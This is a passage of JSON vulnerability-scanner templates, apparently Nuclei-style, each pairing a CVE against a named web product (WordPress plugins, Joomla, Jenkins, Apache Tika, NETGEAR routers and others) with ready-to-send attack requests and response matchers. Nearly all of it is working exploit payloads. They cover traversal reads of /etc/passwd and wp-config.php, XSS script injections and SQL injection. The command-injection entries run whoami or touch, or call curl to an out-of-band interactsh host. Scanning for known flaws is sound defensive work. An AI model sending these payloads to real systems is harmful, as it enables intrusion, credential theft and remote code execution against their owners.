Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8715","info":{"name":"AppWeb - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Digest username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>confirm(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19137","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&really_del"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000861","info":{"name":"Jenkins - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["package#vulntest"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9845","info":{"name":"Etherpad Lite <1.6.4 - Admin Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Etherpad version","Plugin manager","Installed parts"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-15138","info":{"name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data","{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19439","info":{"name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"],"matchers":[{"type":"word","part":"body","words":["<script>alert(1337)</script><!--</TITLE>"]}]}]},{"id":"CVE-2018-15917","info":{"name":"Jorani Leave Management System 0.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1\nHost: {{Hostname}}\n","GET /session/login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","_jorani"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-19287","info":{"name":"WordPress Ninja Forms <3.3.18 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\"><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Begin Date\" value=\"\\\"><img src=x onerror=alert(document.domain);//\">"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20463","info":{"name":"WordPress JSmol2WP <=1.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_USER',","'DB_PASSWORD'"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16159","info":{"name":"WordPress Gift Voucher <4.1.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"images\") && contains(body, \"title\")"],"condition":"and"}]}]},{"id":"CVE-2018-12998","info":{"name":"Zoho manageengine - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8-  Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12296","info":{"name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/external/7.0/system.System.get_infos HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["\"version\":","\"serial_number\":"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["\"version\": \"([0-9.]+)\""],"part":"body"}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19326","info":{"name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-1271","info":{"name":"Spring MVC Framework - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini","{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20608","info":{"name":"Imcat 4.4 - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10736","info":{"name":"NagiosXI <= 5.4.12 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(<a href=\"/names\\.nsf/[0-9a-z\\/]+\\?OpenDocument)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-4385","info":{"name":"Cofax <=2.0RC3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>\"</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Horde :: User Administration</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0760","info":{"name":"Jakarta Tomcat 3.1 and 3.0 - Exposure","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/examples/jsp/snp/snoop.jsp"],"matchers-condition":"and","matchers":[{"type":"word","words":["Request Information","Path info","Server name","Remote address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b  - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["PhotoXhibit","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["S3 Video Plugin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script><\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["= Indexisto"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WPSOLR Search Engine ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Smart Wizard Result</title> "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<b>Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Page Layout Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File 